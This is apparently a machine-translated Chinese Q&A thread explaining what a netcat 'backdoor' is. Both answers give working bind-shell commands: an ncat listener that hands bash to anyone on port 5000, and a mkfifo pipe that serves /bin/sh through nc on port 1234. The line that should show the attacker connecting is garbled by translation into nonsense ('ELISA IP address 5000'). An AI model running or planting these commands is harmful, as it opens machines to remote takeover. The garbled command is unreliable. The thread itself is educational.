我最近读到关于 netcat 的文章,经常有人提到它可以用作“后门”。后门到底是什么意思?有人能举个 netcat 这样使用的例子吗?
答案1
使用 netcat,普通用户可以生成远程 shell。例如,以下命令将允许远程用户访问端口 5000 上的 bash shell
ncat -l -p 5000 -e /bin/bash
一旦运行,攻击者所要做的就是:
酶联免疫吸附试验IP地址5000
您甚至可以在自己的计算机上尝试这个示例。
然而,只有在没有防火墙阻止访问端口 5000 的情况下,这才会通过互联网起作用。
答案2
任何可以监听传入网络连接的东西(如Perl、python、zsh、socat、inetd)都可以被视为后门。
nc我认为为什么某个程序比其他程序更可能被视为后门(尽管它在这方面的功能要少得多)的主要原因是它的手册页确实展示了这样一个后门的例子:
$ rm -f /tmp/f; mkfifo /tmp/f
$ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f